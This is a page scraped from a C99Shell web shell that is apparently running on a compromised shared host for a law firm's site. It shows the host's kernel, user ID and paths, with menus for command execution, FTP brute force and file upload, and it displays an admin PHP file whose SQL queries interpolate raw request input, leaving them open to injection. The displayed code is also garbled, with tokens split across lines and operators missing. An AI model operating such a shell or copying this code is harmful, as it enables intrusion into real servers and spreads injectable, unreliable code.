!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/mophlawyer.com/admin/module/banner/   drwxr-xr-x
Free 238.42 GB of 981.82 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     banner_form_edit.php (15.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<style>
        .file {
  visibility: hidden;
  position: absolute;
}
</style>

<?php 
ob_start
();
session_start();
if(!
$_SESSION['fullname']){
    
header("location: index.php");
    
}
require_once (
'includes/db.php');
$r_id=$_GET['r_id'];

  if(isset(
$_POST['submitform'])){

    
$datenow=date("Y-m-d");
    
$title=$_POST['input_title'];

    if (!empty(
$_FILES["inputfiles"]["name"])){  
        
$images $_FILES["inputfiles"]["tmp_name"];
          
$file strtolower($_FILES["inputfiles"]["name"]);
            
//$sizefile = $_FILES["inputfile"]["size"];
            
$datefile=date("YmdHis"); 
            
$typestrrchr($file,".");
        
$new_images "thumbnails_".mt_rand(10,9999).$datefile;
        
//copy($_FILES["inputfile"]["tmp_name"],"uploads/".$_FILES["inputfile"]["name"]);
        
$width=1500//*** Fix Width & Heigh (Autu caculate) ***//
        
$size=GetimageSize($images);
        
$height=round($width*$size[1]/$size[0]);
        
$images_orig ImageCreateFromJPEG($images);
        
$photoX ImagesX($images_orig);
        
$photoY ImagesY($images_orig);
        
$images_fin ImageCreateTrueColor($width$height);
        
ImageCopyResampled($images_fin$images_orig0000$width+1$height+1$photoX$photoY);
        
ImageJPEG($images_fin,"uploads/".$new_images.$type);
        
ImageDestroy($images_orig);
        
ImageDestroy($images_fin);
             @
unlink("uploads/".$_POST["oldfile"]);
        }else
        {
            
$file$_POST["oldfile"];
            
$file strtolower($file);
            
$typestrrchr($file,".");
            
$exp explode('.' $file);
            
$new_images substr($file , -(strlen($exp[count($exp)-1])+1));
        
        }
      
        
$conn->setAttribute(PDO::ATTR_ERRMODEPDO::ERRMODE_EXCEPTION);
        
$sql "UPDATE tbl_banner SET titlename ='$title',image_banner='$new_images$type' WHERE id = '$r_id' ";
  
         
$stmt $conn->prepare($sql);
         
$stmt->execute();
         
header"location: banner_dashboard.php" );
        exit(
0);
            

    
/*
    if (!empty($_FILES["inputfiles_2"]["name"])){ 
      $images2 = $_FILES["inputfiles_2"]["tmp_name"];
        $file2 = strtolower($_FILES["inputfiles_2"]["name"]);
          //$sizefile = $_FILES["inputfile"]["size"];
          $datefile2=date("YmdHis"); 
          $type2= strrchr($file2,".");
      $newname2 = "thumbnails_".mt_rand(10,9999).$datefile2.$type2;
      //copy($_FILES["inputfile"]["tmp_name"],"uploads/".$_FILES["inputfile"]["name"]);
      $width2=800; //*** Fix Width & Heigh (Autu caculate) /
      $size2=GetimageSize($images2);
      $height2=round($width2*$size2[1]/$size2[0]);
      $images_orig2 = ImageCreateFromJPEG($images2);
      $photoX2 = ImagesX($images_orig2);
      $photoY2 = ImagesY($images_orig2);
      $images_fin2 = ImageCreateTrueColor($width2, $height2);
      ImageCopyResampled($images_fin2, $images_orig2, 0, 0, 0, 0, $width2+1, $height2+1, $photoX2, $photoY2);
      ImageJPEG($images_fin2,"uploads/".$newname2);
      ImageDestroy($images_orig2);
      ImageDestroy($images_fin2);
    }else{ echo "no file 2";}

    if (!empty($_FILES["inputfiles_3"]["name"])){ 
      $images3 = $_FILES["inputfiles_3"]["tmp_name"];
        $file3 = strtolower($_FILES["inputfiles_3"]["name"]);
          //$sizefile = $_FILES["inputfile"]["size"];
          $datefile3=date("YmdHis"); 
          $type3= strrchr($file3,".");
      $newname3 = "thumbnails_".mt_rand(10,9999).$datefile3.$type3;
      //copy($_FILES["inputfile"]["tmp_name"],"uploads/".$_FILES["inputfile"]["name"]);
      $width3=800; //*** Fix Width & Heigh (Autu caculate) 
      $size3=GetimageSize($images2);
      $height3=round($width2*$size2[1]/$size2[0]);
      $images_orig3 = ImageCreateFromJPEG($images3);
      $photoX3 = ImagesX($images_orig3);
      $photoY3 = ImagesY($images_orig3);
      $images_fin3 = ImageCreateTrueColor($width3, $height3);
      ImageCopyResampled($images_fin3, $images_orig3, 0, 0, 0, 0, $width3+1, $height3+1, $photoX3, $photoY3);
      ImageJPEG($images_fin3,"uploads/".$newname3);
      ImageDestroy($images_orig3);
      ImageDestroy($images_fin3);
    }else{ echo "no file 3";}
*/
      
$strSQL $conn->prepare("INSERT INTO tbl_banner(titlename,image_banner,creat_date)
      VALUES ('
$title','$newname','$datenow')");
      
$strSQL->execute();

     if(
$status= isset($status) ? $status1){
      
header"refresh: 0; url=banner_dashboard.php" );
      exit(
0);   
      }else{ 
$status= isset($status) ? $status0; } }
    
?>

<!DOCTYPE html>
<html>
  <head>
    <title>Admin Dashboard : Automation Software</title>
    <meta charset="utf-8">
    <meta content="ie=edge" http-equiv="x-ua-compatible">
    <meta content="template language" name="keywords">
    <meta content="Autosoft" name="author">
    <meta content="Admin dashboard Autosoft" name="description">
    <meta content="width=device-width, initial-scale=1" name="viewport">
    <link href="img/favicon_autosoft.png" rel="shortcut icon">
    <link href="https://fonts.googleapis.com/css?family=Rubik:300,400,500" rel="stylesheet" type="text/css">
    <link href="bower_components/select2/dist/css/select2.min.css" rel="stylesheet">
    <link href="bower_components/bootstrap-daterangepicker/daterangepicker.css" rel="stylesheet">
    <link href="bower_components/dropzone/dist/dropzone.css" rel="stylesheet">
    <link href="bower_components/datatables.net-bs/css/dataTables.bootstrap.min.css" rel="stylesheet">
    <link href="bower_components/fullcalendar/dist/fullcalendar.min.css" rel="stylesheet">
    <link href="bower_components/perfect-scrollbar/css/perfect-scrollbar.min.css" rel="stylesheet">
    <link href="bower_components/slick-carousel/slick/slick.css" rel="stylesheet">
    <link href="css/main.css?version=4.4.0" rel="stylesheet">


  </head>
  <body class="menu-position-side menu-side-left full-screen">
    <div class="all-wrapper solid-bg-all">
      
    <div class="layout-w">
      <!--------------------
        START - Mobile Menu
        -------------------->
      <?php //include ('includes/mobile_menu.php'); ?>
        <!--------------------
        START - Main Menu
        -------------------->
        <?php include ('includes/main_menu.php'); ?>
        <!--------------------
        END - Main Menu
        -------------------->
        <div class="content-w">
          <!--------------------
          START - Top Bar
          -------------------->
          <?php include('includes/top_setting.php'); ?>
          <!--------------------
          END - Top Bar
          -------------------->
          <div class="content-i">
                 <div class="content-box"><div class="row">
                    <div class="col-lg-12">
                        <div class="element-wrapper">
                        <div class="element-box">

                            <form action="#" method="POST" enctype="multipart/form-data" >
                                
                            <h5 class="form-header">
                                Banner Page
                            </h5>
                            <div class="form-desc">
                                ลงข้อมูล Banner หน้าหลัก
                            </div>
                            <?php
                            $r_id
=$_GET['r_id'];

                            
$result1 $conn->prepare("SELECT * FROM tbl_banner WHERE id=$r_id");
                            
$result1->execute();
                            for(
$i=0$row1 $result1->fetch(); $i++ ){
                            
$id1 $row1['id'];
                            

                            
?>
                            <div class="form-group">
                                <label for=""> Title/หัวข้อเรื่อง</label>
                                <input class="form-control" placeholder="Enter title" type="text" name="input_title" value="<?php echo $row1['titlename']; ?>">
                            </div>
                            
                            
                            
                            <fieldset class="form-group">
                                <legend><span>รูปภาพ Banner 1 : </span></legend>


                                <div class="mt-3 col-sm-8">
                                        <div class="ml-2 col-sm-6">
                                        <img src="uploads/<?php echo $row1['image_banner']; ?>" id="preview" class="img-thumbnail">
                                        </div>


                                        <input type="file" name="inputfiles" class="file" accept="image/*">
                                        <input type="hidden" name="oldfile" value="<?php echo $row1["image_banner"];?>">
                                          <div class="input-group my-3">
                                            <input type="text" class="form-control" disabled placeholder="Upload File" id="file">
                                            <div class="input-group-append">
                                              <button type="button" class="browse btn btn-primary">Browse...</button>
                                            </div>
                                          </div>
                                      </div>
    
                                      <div class="form-buttons-w">
                                  
                                          <input class="btn btn-primary" type="submit" name="submitform" value="Submit"  />
        
                                      </div>
                                  </div>
                            </fieldset>
                            
                            
                            </form>
                            <?php ?>
                        </div>
                        </div>
                    </div>
                </div>
          </div>
        </div>
      </div>
      <div class="display-type"></div>
    </div>


    <div aria-hidden="true" class="onboarding-modal modal fade animated" id="Modal_success" role="dialog" tabindex="-1">
        <div class="modal-dialog modal-centered" role="document">
          <div class="modal-content text-center">
            <button aria-label="Close" class="close" data-dismiss="modal" type="button"><span class="close-label">Skip</span><span class="os-icon os-icon-close"></span></button>
            <div class="onboarding-media">
              
        
      <div class="auth-w  centered">
        <h5 class="auth-header">
          บันทึกข้อมูลสำเร็จ
        </h5>
        <div class="logged-user-w">
          <div class="avatar-w">
           
           <!-- <img src="../autosoft/img/team/"> -->
          </div>
        
        </div>
      </div>
        



            </div>
            <div class="onboarding-content with-gradient">
              <h4 class="onboarding-title">
              บันทึกข้อมูลสำเร็จ
              </h4>
              <div class="onboarding-text">
                information from them before they start using your app.
              </div>
            </div>
          </div>
        </div>
      </div>

      <div aria-hidden="true" class="onboarding-modal modal fade animated" id="Modal_Fail" role="dialog" tabindex="-1">
        <div class="modal-dialog modal-centered" role="document">
          <div class="modal-content text-center">
            <button aria-label="Close" class="close" data-dismiss="modal" type="button"><span class="close-label">Skip Intro</span><span class="os-icon os-icon-close"></span></button>
            <div class="onboarding-media">
              <img alt="" src="img/bigicon2.png" width="200px">
            </div>
            <div class="onboarding-content with-gradient">
              <h4 class="onboarding-title">
                ไม่ผ่าน
              </h4>
              <div class="onboarding-text">
                This is an example of a multistep onboarding screen, you can use it to introduce your customers to your app, or collect additional information from them before they start using your app.
              </div>
            </div>
          </div>
        </div>
      </div>
<?php

?>

    <script src="bower_components/jquery/dist/jquery.min.js"></script>
    <script src="bower_components/popper.js/dist/umd/popper.min.js"></script>
    <script src="bower_components/moment/moment.js"></script>
    <script src="bower_components/chart.js/dist/Chart.min.js"></script>
    <script src="bower_components/select2/dist/js/select2.full.min.js"></script>
    <script src="bower_components/jquery-bar-rating/dist/jquery.barrating.min.js"></script>

    <script src="bower_components/bootstrap-validator/dist/validator.min.js"></script>
    <script src="bower_components/bootstrap-daterangepicker/daterangepicker.js"></script>
    <script src="bower_components/ion.rangeSlider/js/ion.rangeSlider.min.js"></script>
    <script src="bower_components/dropzone/dist/dropzone.js"></script>
    <script src="bower_components/editable-table/mindmup-editabletable.js"></script>
    <script src="bower_components/datatables.net/js/jquery.dataTables.min.js"></script>
    <script src="bower_components/datatables.net-bs/js/dataTables.bootstrap.min.js"></script>
    <script src="bower_components/fullcalendar/dist/fullcalendar.min.js"></script>
    <script src="bower_components/perfect-scrollbar/js/perfect-scrollbar.jquery.min.js"></script>
    <script src="bower_components/tether/dist/js/tether.min.js"></script>
    <script src="bower_components/slick-carousel/slick/slick.min.js"></script>
    <script src="bower_components/bootstrap/js/dist/util.js"></script>
    <script src="bower_components/bootstrap/js/dist/alert.js"></script>
    <script src="bower_components/bootstrap/js/dist/button.js"></script>
    <script src="bower_components/bootstrap/js/dist/carousel.js"></script>
    <script src="bower_components/bootstrap/js/dist/collapse.js"></script>
    <script src="bower_components/bootstrap/js/dist/dropdown.js"></script>
    <script src="bower_components/bootstrap/js/dist/modal.js"></script>
    <script src="bower_components/bootstrap/js/dist/tab.js"></script>
    <script src="bower_components/bootstrap/js/dist/tooltip.js"></script>
    <script src="bower_components/bootstrap/js/dist/popover.js"></script>
    <script src="js/demo_customizer.js?version=4.4.0"></script>
    <script src="js/main.js?version=4.4.0"></script>

    <script>

          $(document).on("click", ".browse", function() {
            var file = $(this).parents().find(".file");
            file.trigger("click");
          });
          $('input[type="file"]').change(function(e) {
            var fileName = e.target.files[0].name;
            $("#file").val(fileName);

            var reader = new FileReader();
            reader.onload = function(e) {
              // get loaded data and render thumbnail.
              document.getElementById("preview").src = e.target.result;
            };
            // read the image file as a data URL.
            reader.readAsDataURL(this.files[0]);
          });


          

    </script>

         


<script>

$(document).ready(function(){

  if(<?php echo $status?>==1) {
    $("#Modal_success").modal().on("hidden.bs.modal", function () {
        header( "refresh: 0; url=banner_dashboard.php" );
            exit(0);
  });

    
  }
  else if(<?php echo $status?>==0){
    $("#Modal_Fail").modal();

  } 
  
});

</script>
    <script>
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
      (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
      m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
      
      ga('create', 'UA-XXXXXXX-9', 'auto');
      ga('send', 'pageview');
    </script>
  </body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0131 ]--